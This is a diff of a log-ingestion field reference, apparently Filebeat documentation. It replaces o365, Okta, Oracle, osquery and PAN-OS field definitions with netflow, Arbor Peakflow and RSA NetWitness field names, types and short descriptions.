+*`netflow.reverse_tcp_acknowledgement_number`*:: + -- -type: keyword +type: long -- -*`o365.audit.AppId`*:: +*`netflow.reverse_tcp_control_bits`*:: + -- -type: keyword +type: integer -- -*`o365.audit.ApplicationDisplayName`*:: +*`netflow.reverse_tcp_destination_port`*:: + -- -type: keyword +type: integer -- -*`o365.audit.ApplicationId`*:: +*`netflow.reverse_tcp_fin_total_count`*:: + -- -type: keyword +type: long -- -*`o365.audit.AzureActiveDirectoryEventType`*:: +*`netflow.reverse_tcp_header_length`*:: + -- -type: keyword +type: short -- -*`o365.audit.ExchangeMetaData.*`*:: +*`netflow.reverse_tcp_options`*:: + -- -type: object +type: long -- -*`o365.audit.Category`*:: +*`netflow.reverse_tcp_psh_total_count`*:: + -- -type: keyword +type: long -- -*`o365.audit.ClientAppId`*:: +*`netflow.reverse_tcp_rst_total_count`*:: + -- -type: keyword +type: long -- -*`o365.audit.ClientInfoString`*:: +*`netflow.reverse_tcp_sequence_number`*:: + -- -type: keyword +type: long -- -*`o365.audit.ClientIP`*:: +*`netflow.reverse_tcp_source_port`*:: + -- -type: keyword +type: integer -- -*`o365.audit.ClientIPAddress`*:: +*`netflow.reverse_tcp_syn_total_count`*:: + -- -type: keyword +type: long -- -*`o365.audit.Comments`*:: +*`netflow.reverse_tcp_urg_total_count`*:: + -- -type: text +type: long -- -*`o365.audit.CorrelationId`*:: +*`netflow.reverse_tcp_urgent_pointer`*:: + -- -type: keyword +type: integer -- -*`o365.audit.CreationTime`*:: +*`netflow.reverse_tcp_window_scale`*:: + -- -type: keyword +type: integer -- -*`o365.audit.CustomUniqueId`*:: +*`netflow.reverse_tcp_window_size`*:: + -- -type: keyword +type: integer -- -*`o365.audit.Data`*:: +*`netflow.reverse_total_length_ipv4`*:: + -- -type: keyword +type: integer -- -*`o365.audit.DataType`*:: +*`netflow.reverse_transport_octet_delta_count`*:: + -- -type: keyword +type: long -- -*`o365.audit.EntityType`*:: +*`netflow.reverse_transport_packet_delta_count`*:: + -- -type: keyword +type: long -- -*`o365.audit.EventData`*:: +*`netflow.reverse_tunnel_technology`*:: + -- type: keyword -- -*`o365.audit.EventSource`*:: +*`netflow.reverse_udp_destination_port`*:: + -- -type: keyword +type: integer -- -*`o365.audit.ExceptionInfo.*`*:: +*`netflow.reverse_udp_message_length`*:: + -- -type: object +type: integer -- -*`o365.audit.ExtendedProperties.*`*:: +*`netflow.reverse_udp_source_port`*:: + -- -type: object +type: integer -- -*`o365.audit.ExternalAccess`*:: +*`netflow.reverse_union_tcp_flags`*:: + -- -type: keyword +type: short -- -*`o365.audit.GroupName`*:: +*`netflow.reverse_upper_ci_limit`*:: + -- -type: keyword +type: double -- -*`o365.audit.Id`*:: +*`netflow.reverse_user_name`*:: + -- type: keyword -- -*`o365.audit.ImplicitShare`*:: +*`netflow.reverse_value_distribution_method`*:: + -- -type: keyword +type: short -- -*`o365.audit.IncidentId`*:: +*`netflow.reverse_virtual_station_interface_id`*:: + -- type: keyword -- -*`o365.audit.InternalLogonType`*:: +*`netflow.reverse_virtual_station_interface_name`*:: + -- type: keyword -- -*`o365.audit.InterSystemsId`*:: +*`netflow.reverse_virtual_station_name`*:: + -- type: keyword -- -*`o365.audit.IntraSystemId`*:: +*`netflow.reverse_virtual_station_uuid`*:: + -- type: keyword -- -*`o365.audit.Item.*`*:: +*`netflow.reverse_vlan_id`*:: + -- -type: object +type: integer -- -*`o365.audit.Item.*.*`*:: +*`netflow.reverse_vr_fname`*:: + -- -type: object +type: keyword -- -*`o365.audit.ItemName`*:: +*`netflow.reverse_wlan_channel_id`*:: + -- -type: keyword +type: short -- -*`o365.audit.ItemType`*:: +*`netflow.reverse_wlan_ssid`*:: + -- type: keyword -- -*`o365.audit.ListId`*:: +*`netflow.reverse_wtp_mac_address`*:: + -- type: keyword -- -*`o365.audit.ListItemUniqueId`*:: +*`netflow.rfc3550_jitter_microseconds`*:: + -- -type: keyword +type: long -- -*`o365.audit.LogonError`*:: +*`netflow.rfc3550_jitter_milliseconds`*:: + -- -type: keyword +type: long -- -*`o365.audit.LogonType`*:: +*`netflow.rfc3550_jitter_nanoseconds`*:: + -- -type: keyword +type: long -- -*`o365.audit.LogonUserSid`*:: +*`netflow.rtp_payload_type`*:: + -- -type: keyword +type: short -- -*`o365.audit.MailboxGuid`*:: +*`netflow.rtp_sequence_number`*:: + -- -type: keyword +type: integer -- -*`o365.audit.MailboxOwnerMasterAccountSid`*:: +*`netflow.sampler_id`*:: + -- -type: keyword +type: short -- -*`o365.audit.MailboxOwnerSid`*:: +*`netflow.sampler_mode`*:: + -- -type: keyword +type: short -- -*`o365.audit.MailboxOwnerUPN`*:: +*`netflow.sampler_name`*:: + -- type: keyword -- -*`o365.audit.Members`*:: +*`netflow.sampler_random_interval`*:: + -- -type: array +type: long -- -*`o365.audit.Members.*`*:: +*`netflow.sampling_algorithm`*:: + -- -type: object +type: short -- -*`o365.audit.ModifiedProperties.*.*`*:: +*`netflow.sampling_flow_interval`*:: + -- -type: object +type: long -- -*`o365.audit.Name`*:: +*`netflow.sampling_flow_spacing`*:: + -- -type: keyword +type: long -- -*`o365.audit.ObjectId`*:: +*`netflow.sampling_interval`*:: + -- -type: keyword +type: long -- -*`o365.audit.Operation`*:: +*`netflow.sampling_packet_interval`*:: + -- -type: keyword +type: long -- -*`o365.audit.OrganizationId`*:: +*`netflow.sampling_packet_space`*:: + -- -type: keyword +type: long -- -*`o365.audit.OrganizationName`*:: +*`netflow.sampling_population`*:: + -- -type: keyword +type: long -- -*`o365.audit.OriginatingServer`*:: +*`netflow.sampling_probability`*:: + -- -type: keyword +type: double -- -*`o365.audit.Parameters.*`*:: +*`netflow.sampling_size`*:: + -- -type: object +type: long -- -*`o365.audit.PolicyDetails`*:: +*`netflow.sampling_time_interval`*:: + -- -type: array +type: long -- -*`o365.audit.PolicyId`*:: +*`netflow.sampling_time_space`*:: + -- -type: keyword +type: long -- -*`o365.audit.RecordType`*:: +*`netflow.second_packet_banner`*:: + -- type: keyword -- -*`o365.audit.ResultStatus`*:: +*`netflow.section_exported_octets`*:: + -- -type: keyword +type: integer -- -*`o365.audit.SensitiveInfoDetectionIsIncluded`*:: +*`netflow.section_offset`*:: + -- -type: keyword +type: integer -- -*`o365.audit.SharePointMetaData.*`*:: +*`netflow.selection_sequence_id`*:: + -- -type: object +type: long -- -*`o365.audit.SessionId`*:: +*`netflow.selector_algorithm`*:: + -- -type: keyword +type: integer -- -*`o365.audit.Severity`*:: +*`netflow.selector_id`*:: + -- -type: keyword +type: long -- -*`o365.audit.Site`*:: +*`netflow.selector_id_total_flows_observed`*:: + -- -type: keyword +type: long -- -*`o365.audit.SiteUrl`*:: +*`netflow.selector_id_total_flows_selected`*:: + -- -type: keyword +type: long -- -*`o365.audit.Source`*:: +*`netflow.selector_id_total_pkts_observed`*:: + -- -type: keyword +type: long -- -*`o365.audit.SourceFileExtension`*:: +*`netflow.selector_id_total_pkts_selected`*:: + -- -type: keyword +type: long -- -*`o365.audit.SourceFileName`*:: +*`netflow.selector_name`*:: + -- type: keyword -- -*`o365.audit.SourceRelativeUrl`*:: +*`netflow.service_name`*:: + -- type: keyword -- -*`o365.audit.Status`*:: +*`netflow.session_scope`*:: + -- -type: keyword +type: short -- -*`o365.audit.SupportTicketId`*:: +*`netflow.silk_app_label`*:: + -- -type: keyword +type: integer -- -*`o365.audit.Target`*:: +*`netflow.small_packet_count`*:: + -- -type: array +type: long -- -*`o365.audit.TargetContextId`*:: +*`netflow.source_ipv4_address`*:: + -- -type: keyword +type: ip -- -*`o365.audit.TargetUserOrGroupName`*:: +*`netflow.source_ipv4_prefix`*:: + -- -type: keyword +type: ip -- -*`o365.audit.TargetUserOrGroupType`*:: +*`netflow.source_ipv4_prefix_length`*:: + -- -type: keyword +type: short -- -*`o365.audit.TeamName`*:: +*`netflow.source_ipv6_address`*:: + -- -type: keyword +type: ip -- -*`o365.audit.TeamGuid`*:: +*`netflow.source_ipv6_prefix`*:: + -- -type: keyword +type: ip -- -*`o365.audit.UniqueSharingId`*:: +*`netflow.source_ipv6_prefix_length`*:: + -- -type: keyword +type: short -- -*`o365.audit.UserAgent`*:: +*`netflow.source_mac_address`*:: + -- type: keyword -- -*`o365.audit.UserId`*:: +*`netflow.source_transport_port`*:: + -- -type: keyword +type: integer -- -*`o365.audit.UserKey`*:: +*`netflow.source_transport_ports_limit`*:: + -- -type: keyword +type: integer -- -*`o365.audit.UserType`*:: +*`netflow.src_traffic_index`*:: + -- -type: keyword +type: long -- -*`o365.audit.Version`*:: +*`netflow.ssl_cert_serial_number`*:: + -- type: keyword -- -*`o365.audit.WebId`*:: +*`netflow.ssl_cert_signature`*:: + -- type: keyword -- -*`o365.audit.Workload`*:: +*`netflow.ssl_cert_validity_not_after`*:: + -- type: keyword -- -*`o365.audit.YammerNetworkId`*:: +*`netflow.ssl_cert_validity_not_before`*:: + -- type: keyword -- -[[exported-fields-okta]] -== Okta fields - -Module for handling system logs from Okta. - - - -[float] -=== okta - -Fields from Okta. - - - -*`okta.uuid`*:: +*`netflow.ssl_cert_version`*:: + -- -The unique identifier of the Okta LogEvent. +type: short +-- +*`netflow.ssl_certificate_hash`*:: ++ +-- type: keyword -- -*`okta.event_type`*:: +*`netflow.ssl_cipher`*:: + -- -The type of the LogEvent. - - type: keyword -- -*`okta.version`*:: +*`netflow.ssl_client_version`*:: + -- -The version of the LogEvent. - - -type: keyword +type: short -- -*`okta.severity`*:: +*`netflow.ssl_compression_method`*:: + -- -The severity of the LogEvent. Must be one of DEBUG, INFO, WARN, or ERROR. +type: short +-- +*`netflow.ssl_object_type`*:: ++ +-- type: keyword -- -*`okta.display_message`*:: +*`netflow.ssl_object_value`*:: + -- -The display message of the LogEvent. - - type: keyword -- -[float] -=== actor - -Fields that let you store information of the actor for the LogEvent. - - - -*`okta.actor.id`*:: +*`netflow.ssl_public_key_algorithm`*:: + -- -Identifier of the actor. - - type: keyword -- -*`okta.actor.type`*:: +*`netflow.ssl_public_key_length`*:: + -- -Type of the actor. - - type: keyword -- -*`okta.actor.alternate_id`*:: +*`netflow.ssl_server_cipher`*:: + -- -Alternate identifier of the actor. +type: long +-- +*`netflow.ssl_server_name`*:: ++ +-- type: keyword -- -*`okta.actor.display_name`*:: +*`netflow.sta_ipv4_address`*:: + -- -Display name of the actor. +type: ip +-- +*`netflow.sta_mac_address`*:: ++ +-- type: keyword -- -[float] -=== client - -Fields that let you store information about the client of the actor. - +*`netflow.standard_deviation_interarrival_time`*:: ++ +-- +type: long +-- -*`okta.client.ip`*:: +*`netflow.standard_deviation_payload_length`*:: + -- -The IP address of the client. +type: short +-- -type: ip +*`netflow.system_init_time_milliseconds`*:: ++ +-- +type: date -- -[float] -=== user_agent +*`netflow.tcp_ack_total_count`*:: ++ +-- +type: long -Fields about the user agent information of the client. +-- +*`netflow.tcp_acknowledgement_number`*:: ++ +-- +type: long +-- -*`okta.client.user_agent.raw_user_agent`*:: +*`netflow.tcp_control_bits`*:: + -- -The raw informaton of the user agent. +type: integer +-- -type: keyword +*`netflow.tcp_destination_port`*:: ++ +-- +type: integer -- -*`okta.client.user_agent.os`*:: +*`netflow.tcp_fin_total_count`*:: + -- -The OS informaton. +type: long +-- -type: keyword +*`netflow.tcp_header_length`*:: ++ +-- +type: short -- -*`okta.client.user_agent.browser`*:: +*`netflow.tcp_options`*:: + -- -The browser informaton of the client. +type: long +-- -type: keyword +*`netflow.tcp_psh_total_count`*:: ++ +-- +type: long -- -*`okta.client.zone`*:: +*`netflow.tcp_rst_total_count`*:: + -- -The zone information of the client. +type: long +-- -type: keyword +*`netflow.tcp_sequence_number`*:: ++ +-- +type: long -- -*`okta.client.device`*:: +*`netflow.tcp_source_port`*:: + -- -The information of the client device. +type: integer +-- -type: keyword +*`netflow.tcp_syn_total_count`*:: ++ +-- +type: long -- -*`okta.client.id`*:: +*`netflow.tcp_urg_total_count`*:: + -- -The identifier of the client. +type: long +-- -type: keyword +*`netflow.tcp_urgent_pointer`*:: ++ +-- +type: integer -- -[float] -=== outcome +*`netflow.tcp_window_scale`*:: ++ +-- +type: integer -Fields that let you store information about the outcome. +-- +*`netflow.tcp_window_size`*:: ++ +-- +type: integer +-- -*`okta.outcome.reason`*:: +*`netflow.template_id`*:: + -- -The reason of the outcome. +type: integer +-- +*`netflow.tftp_filename`*:: ++ +-- type: keyword -- -*`okta.outcome.result`*:: +*`netflow.tftp_mode`*:: + -- -The result of the outcome. Must be one of: SUCCESS, FAILURE, SKIPPED, ALLOW, DENY, CHALLENGE, UNKNOWN. - - type: keyword -- -*`okta.target`*:: +*`netflow.timestamp`*:: + -- -The list of targets. - - -type: array +type: long -- -[float] -=== transaction +*`netflow.timestamp_absolute_monitoring-interval`*:: ++ +-- +type: long -Fields that let you store information about related transaction. +-- +*`netflow.total_length_ipv4`*:: ++ +-- +type: integer +-- -*`okta.transaction.id`*:: +*`netflow.traffic_type`*:: + -- -Identifier of the transaction. +type: short +-- -type: keyword +*`netflow.transport_octet_delta_count`*:: ++ +-- +type: long -- -*`okta.transaction.type`*:: +*`netflow.transport_packet_delta_count`*:: + -- -The type of transaction. Must be one of "WEB", "JOB". +type: long +-- +*`netflow.tunnel_technology`*:: ++ +-- type: keyword -- -[float] -=== debug_context +*`netflow.udp_destination_port`*:: ++ +-- +type: integer -Fields that let you store information about the debug context. +-- +*`netflow.udp_message_length`*:: ++ +-- +type: integer +-- -[float] -=== debug_data +*`netflow.udp_source_port`*:: ++ +-- +type: integer -The debug data. +-- +*`netflow.union_tcp_flags`*:: ++ +-- +type: short +-- -*`okta.debug_context.debug_data.device_fingerprint`*:: +*`netflow.upper_ci_limit`*:: + -- -The fingerprint of the device. +type: double +-- +*`netflow.user_name`*:: ++ +-- type: keyword -- -*`okta.debug_context.debug_data.request_id`*:: +*`netflow.username`*:: + -- -The identifier of the request. - - type: keyword -- -*`okta.debug_context.debug_data.request_uri`*:: +*`netflow.value_distribution_method`*:: + -- -The request URI. +type: short +-- -type: keyword +*`netflow.viptela_vpn_id`*:: ++ +-- +type: long -- -*`okta.debug_context.debug_data.threat_suspected`*:: +*`netflow.virtual_station_interface_id`*:: + -- -Threat suspected. +type: short +-- +*`netflow.virtual_station_interface_name`*:: ++ +-- type: keyword -- -*`okta.debug_context.debug_data.url`*:: +*`netflow.virtual_station_name`*:: + -- -The URL. - - type: keyword -- -[float] -=== authentication_context +*`netflow.virtual_station_uuid`*:: ++ +-- +type: short -Fields that let you store information about authentication context. +-- +*`netflow.vlan_id`*:: ++ +-- +type: integer +-- -*`okta.authentication_context.authentication_provider`*:: +*`netflow.vmware_egress_interface_attr`*:: + -- -The information about the authentication provider. Must be one of OKTA_AUTHENTICATION_PROVIDER, ACTIVE_DIRECTORY, LDAP, FEDERATION, SOCIAL, FACTOR_PROVIDER. +type: integer +-- -type: keyword +*`netflow.vmware_ingress_interface_attr`*:: ++ +-- +type: integer -- -*`okta.authentication_context.authentication_step`*:: +*`netflow.vmware_tenant_dest_ipv4`*:: + -- -The authentication step. +type: ip +-- -type: integer +*`netflow.vmware_tenant_dest_ipv6`*:: ++ +-- +type: ip -- -*`okta.authentication_context.credential_provider`*:: +*`netflow.vmware_tenant_dest_port`*:: + -- -The information about credential provider. Must be one of OKTA_CREDENTIAL_PROVIDER, RSA, SYMANTEC, GOOGLE, DUO, YUBIKEY. +type: integer +-- -type: keyword +*`netflow.vmware_tenant_protocol`*:: ++ +-- +type: short -- -*`okta.authentication_context.credential_type`*:: +*`netflow.vmware_tenant_source_ipv4`*:: + -- -The information about credential type. Must be one of OTP, SMS, PASSWORD, ASSERTION, IWA, EMAIL, OAUTH2, JWT, CERTIFICATE, PRE_SHARED_SYMMETRIC_KEY, OKTA_CLIENT_SESSION, DEVICE_UDID. +type: ip +-- -type: keyword +*`netflow.vmware_tenant_source_ipv6`*:: ++ +-- +type: ip -- -*`okta.authentication_context.issuer`*:: +*`netflow.vmware_tenant_source_port`*:: + -- -The information about the issuer. +type: integer +-- -type: array +*`netflow.vmware_vxlan_export_role`*:: ++ +-- +type: short -- -*`okta.authentication_context.external_session_id`*:: +*`netflow.vpn_identifier`*:: + -- -The session identifer of the external session if any. +type: short +-- +*`netflow.vr_fname`*:: ++ +-- type: keyword -- -*`okta.authentication_context.interface`*:: +*`netflow.waasoptimization_segment`*:: + -- -The interface used. e.g., Outlook, Office365, wsTrust +type: short +-- -type: keyword +*`netflow.wlan_channel_id`*:: ++ +-- +type: short -- -[float] -=== security_context +*`netflow.wlan_ssid`*:: ++ +-- +type: keyword -Fields that let you store information about security context. +-- +*`netflow.wtp_mac_address`*:: ++ +-- +type: keyword +-- -[float] -=== as +*`netflow.xlate_destination_address_ip_v4`*:: ++ +-- +type: ip -The autonomous system. +-- +*`netflow.xlate_destination_port`*:: ++ +-- +type: integer +-- -*`okta.security_context.as.number`*:: +*`netflow.xlate_source_address_ip_v4`*:: + -- -The AS number. +type: ip +-- +*`netflow.xlate_source_port`*:: ++ +-- type: integer -- -[float] -=== organization +[[exported-fields-netscout]] +== Arbor Peakflow SP fields -The organization that owns the AS number. +netscout fields. -*`okta.security_context.as.organization.name`*:: +*`network.interface.name`*:: + -- -The organization name. +Name of the network interface where the traffic has been observed. type: keyword -- -*`okta.security_context.isp`*:: + + +*`rsa.internal.msg`*:: + -- -The Internet Service Provider. - +This key is used to capture the raw message that comes into the Log Decoder type: keyword -- -*`okta.security_context.domain`*:: +*`rsa.internal.messageid`*:: + -- -The domain name. +type: keyword +-- +*`rsa.internal.event_desc`*:: ++ +-- type: keyword -- -*`okta.security_context.is_proxy`*:: +*`rsa.internal.message`*:: + -- -Whether it is a proxy or not. +This key captures the contents of instant messages +type: keyword -type: boolean +-- +*`rsa.internal.time`*:: ++ -- +This is the time at which a session hits a NetWitness Decoder. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness. -[float] -=== request +type: date -Fields that let you store information about the request, in the form of list of ip_chain. +-- +*`rsa.internal.level`*:: ++ +-- +Deprecated key defined only in table map. +type: long -[float] -=== ip_chain +-- -List of ip_chain objects. +*`rsa.internal.msg_id`*:: ++ +-- +This is the Message ID1 value that identifies the exact log parser definition which parses a particular log session. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness +type: keyword +-- -*`okta.request.ip_chain.ip`*:: +*`rsa.internal.msg_vid`*:: + -- -IP address. - +This is the Message ID2 value that identifies the exact log parser definition which parses a particular log session. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness -type: ip +type: keyword -- -*`okta.request.ip_chain.version`*:: +*`rsa.internal.data`*:: + -- -IP version. Must be one of V4, V6. - +Deprecated key defined only in table map. type: keyword -- -*`okta.request.ip_chain.source`*:: +*`rsa.internal.obj_server`*:: + -- -Source information. - +Deprecated key defined only in table map. type: keyword -- -[float] -=== geographical_context - -Geographical information. +*`rsa.internal.obj_val`*:: ++ +-- +Deprecated key defined only in table map. +type: keyword +-- -*`okta.request.ip_chain.geographical_context.city`*:: +*`rsa.internal.resource`*:: + -- -The city. +Deprecated key defined only in table map. type: keyword -- -*`okta.request.ip_chain.geographical_context.state`*:: +*`rsa.internal.obj_id`*:: + -- -The state. +Deprecated key defined only in table map. type: keyword -- -*`okta.request.ip_chain.geographical_context.postal_code`*:: +*`rsa.internal.statement`*:: + -- -The postal code. +Deprecated key defined only in table map. type: keyword -- -*`okta.request.ip_chain.geographical_context.country`*:: +*`rsa.internal.audit_class`*:: + -- -The country. +Deprecated key defined only in table map. type: keyword -- -*`okta.request.ip_chain.geographical_context.geolocation`*:: +*`rsa.internal.entry`*:: + -- -Geolocation information. - +Deprecated key defined only in table map. -type: geo_point +type: keyword -- -[[exported-fields-oracle]] -== Oracle fields +*`rsa.internal.hcode`*:: ++ +-- +Deprecated key defined only in table map. -Oracle Module +type: keyword +-- +*`rsa.internal.inode`*:: ++ +-- +Deprecated key defined only in table map. -[float] -=== oracle +type: long -Fields from Oracle logs. +-- +*`rsa.internal.resource_class`*:: ++ +-- +Deprecated key defined only in table map. +type: keyword -[float] -=== database_audit +-- -Module for parsing Oracle Database audit logs +*`rsa.internal.dead`*:: ++ +-- +Deprecated key defined only in table map. +type: long +-- -*`oracle.database_audit.status`*:: +*`rsa.internal.feed_desc`*:: + -- -Database Audit Status. - +This is used to capture the description of the feed. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness type: keyword -- -*`oracle.database_audit.session_id`*:: +*`rsa.internal.feed_name`*:: + -- -Indicates the audit session ID number. - +This is used to capture the name of the feed. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness type: keyword -- -*`oracle.database_audit.client.terminal`*:: +*`rsa.internal.cid`*:: + -- -If available, the client terminal type, for example "pty". - +This is the unique identifier used to identify a NetWitness Concentrator. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness type: keyword -- -*`oracle.database_audit.client.address`*:: +*`rsa.internal.device_class`*:: + -- -The IP Address or Domain used by the client. - +This is the Classification of the Log Event Source under a predefined fixed set of Event Source Classifications. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness type: keyword -- -*`oracle.database_audit.client.user`*:: +*`rsa.internal.device_group`*:: + -- -The user running the client or connection to the database. - +This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness type: keyword -- -*`oracle.database_audit.database.user`*:: +*`rsa.internal.device_host`*:: + -- -The database user used to authenticate. - +This is the Hostname of the log Event Source sending the logs to NetWitness. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness type: keyword -- -*`oracle.database_audit.privilege`*:: +*`rsa.internal.device_ip`*:: + -- -The privilege group related to the database user. - +This is the IPv4 address of the Log Event Source sending the logs to NetWitness. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness -type: keyword +type: ip -- -*`oracle.database_audit.entry.id`*:: +*`rsa.internal.device_ipv6`*:: + -- -Indicates the current audit entry number, assigned to each audit trail record. The audit entry.id sequence number is shared between fine-grained audit records and regular audit records. - +This is the IPv6 address of the Log Event Source sending the logs to NetWitness. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness -type: keyword +type: ip -- -*`oracle.database_audit.database.host`*:: +*`rsa.internal.device_type`*:: + -- -Client host machine name. - +This is the name of the log parser which parsed a given session. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness type: keyword -- -*`oracle.database_audit.action`*:: +*`rsa.internal.device_type_id`*:: + -- -The action performed during the audit event. This could for example be the raw query. - +Deprecated key defined only in table map. -type: keyword +type: long -- -*`oracle.database_audit.action_number`*:: +*`rsa.internal.did`*:: + -- -Action is a numeric value representing the action the user performed. The corresponding name of the action type is in the AUDIT_ACTIONS table. For example, action 100 refers to LOGON. - +This is the unique identifier used to identify a NetWitness Decoder. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness type: keyword -- -*`oracle.database_audit.database.id`*:: +*`rsa.internal.entropy_req`*:: + -- -Database identifier calculated when the database is created. It corresponds to the DBID column of the V$DATABASE data dictionary view. - +This key is only used by the Entropy Parser, the Meta Type can be either UInt16 or Float32 based on the configuration -type: keyword +type: long -- -*`oracle.database_audit.length`*:: +*`rsa.internal.entropy_res`*:: + -- -Refers to the total number of bytes used in this audit record. This number includes the trailing newline bytes (\n), if any, at the end of the audit record. - +This key is only used by the Entropy Parser, the Meta Type can be either UInt16 or Float32 based on the configuration type: long -- -[[exported-fields-osquery]] -== Osquery fields +*`rsa.internal.event_name`*:: ++ +-- +Deprecated key defined only in table map. -Fields exported by the `osquery` module +type: keyword +-- +*`rsa.internal.feed_category`*:: ++ +-- +This is used to capture the category of the feed. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness -[float] -=== osquery +type: keyword +-- +*`rsa.internal.forward_ip`*:: ++ +-- +This key should be used to capture the IPV4 address of a relay system which forwarded the events from the original system to NetWitness. +type: ip -[float] -=== result +-- -Common fields exported by the result metricset. +*`rsa.internal.forward_ipv6`*:: ++ +-- +This key is used to capture the IPV6 address of a relay system which forwarded the events from the original system to NetWitness. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness +type: ip +-- -*`osquery.result.name`*:: +*`rsa.internal.header_id`*:: + -- -The name of the query that generated this event. - +This is the Header ID value that identifies the exact log parser header definition that parses a particular log session. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness type: keyword -- -*`osquery.result.action`*:: +*`rsa.internal.lc_cid`*:: + -- -For incremental data, marks whether the entry was added or removed. It can be one of "added", "removed", or "snapshot". - +This is a unique Identifier of a Log Collector. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness type: keyword -- -*`osquery.result.host_identifier`*:: +*`rsa.internal.lc_ctime`*:: + -- -The identifier for the host on which the osquery agent is running. Normally the hostname. - +This is the time at which a log is collected in a NetWitness Log Collector. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness -type: keyword +type: date -- -*`osquery.result.unix_time`*:: +*`rsa.internal.mcb_req`*:: + -- -Unix timestamp of the event, in seconds since the epoch. Used for computing the `@timestamp` column. - +This key is only used by the Entropy Parser, the most common byte request is simply which byte for each side (0 thru 255) was seen the most type: long -- -*`osquery.result.calendar_time`*:: +*`rsa.internal.mcb_res`*:: + -- -String representation of the collection time, as formatted by osquery. - +This key is only used by the Entropy Parser, the most common byte response is simply which byte for each side (0 thru 255) was seen the most -type: keyword +type: long -- -[[exported-fields-panw]] -== panw fields - -Module for Palo Alto Networks (PAN-OS) - - +*`rsa.internal.mcbc_req`*:: ++ +-- +This key is only used by the Entropy Parser, the most common byte count is the number of times the most common byte (above) was seen in the session streams -[float] -=== panw +type: long -Fields from the panw module. +-- +*`rsa.internal.mcbc_res`*:: ++ +-- +This key is only used by the Entropy Parser, the most common byte count is the number of times the most common byte (above) was seen in the session streams +type: long -[float] -=== panos +-- -Fields for the Palo Alto Networks PAN-OS logs. +*`rsa.internal.medium`*:: ++ +-- +This key is used to identify if it’s a log/packet session or Layer 2 Encapsulation Type. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness. 32 = log, 33 = correlation session, < 32 is packet session +type: long +-- -*`panw.panos.ruleset`*:: +*`rsa.internal.node_name`*:: + -- -Name of the rule that matched this session. - +Deprecated key defined only in table map. type: keyword -- -[float] -=== source - -Fields to extend the top-level source object. - - - -*`panw.panos.source.zone`*:: +*`rsa.internal.nwe_callback_id`*:: + -- -Source zone for this session. - +This key denotes that event is endpoint related type: keyword -- -*`panw.panos.source.interface`*:: +*`rsa.internal.parse_error`*:: + -- -Source interface for this session. - +This is a special key that stores any Meta key validation error found while parsing a log session. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness type: keyword -- -[float] -=== nat - -Post-NAT source address, if source NAT is performed. - - - -*`panw.panos.source.nat.ip`*:: +*`rsa.internal.payload_req`*:: + -- -Post-NAT source IP. - +This key is only used by the Entropy Parser, the payload size metrics are the payload sizes of each session side at the time of parsing. However, in order to keep -type: ip +type: long -- -*`panw.panos.source.nat.port`*:: +*`rsa.internal.payload_res`*:: + -- -Post-NAT source port. - +This key is only used by the Entropy Parser, the payload size metrics are the payload sizes of each session side at the time of parsing. However, in order to keep type: long -- -[float] -=== destination - -Fields to extend the top-level destination object. +*`rsa.internal.process_vid_dst`*:: ++ +-- +Endpoint generates and uses a unique virtual ID to identify any similar group of process. This ID represents the target process. +type: keyword +-- -*`panw.panos.destination.zone`*:: +*`rsa.internal.process_vid_src`*:: + -- -Destination zone for this session. - +Endpoint generates and uses a unique virtual ID to identify any similar group of process. This ID represents the source process. type: keyword -- -*`panw.panos.destination.interface`*:: +*`rsa.internal.rid`*:: + -- -Destination interface for this session. - +This is a special ID of the Remote Session created by NetWitness Decoder. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness -type: keyword +type: long -- -[float] -=== nat - -Post-NAT destination address, if destination NAT is performed. +*`rsa.internal.session_split`*:: ++ +-- +This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness +type: keyword +-- -*`panw.panos.destination.nat.ip`*:: +*`rsa.internal.site`*:: + -- -Post-NAT destination IP. - +Deprecated key defined only in table map. -type: ip +type: keyword -- -*`panw.panos.destination.nat.port`*:: +*`rsa.internal.size`*:: + -- -Post-NAT destination port. - +This is the size of the session as seen by the NetWitness Decoder. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness type: long -- -*`panw.panos.endreason`*:: +*`rsa.internal.sourcefile`*:: + -- -The reason a session terminated. - +This is the name of the log file or PCAPs that can be imported into NetWitness. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness type: keyword -- -[float] -=== network +*`rsa.internal.ubc_req`*:: ++ +-- +This key is only used by the Entropy Parser, Unique byte count is the number of unique bytes seen in each stream. 256 would mean all byte values of 0 thru 255 were seen at least once -Fields to extend the top-level network object. - - - -*`panw.panos.network.pcap_id`*:: -+ --- -Packet capture ID for a threat. - - -type: keyword - --- - - -*`panw.panos.network.nat.community_id`*:: -+ --- -Community ID flow-hash for the NAT 5-tuple. - - -type: keyword - --- - -[float] -=== file - -Fields to extend the top-level file object. - - - -*`panw.panos.file.hash`*:: -+ --- -Binary hash for a threat file sent to be analyzed by the WildFire service. - - -type: keyword - --- - -[float] -=== url - -Fields to extend the top-level url object. - - - 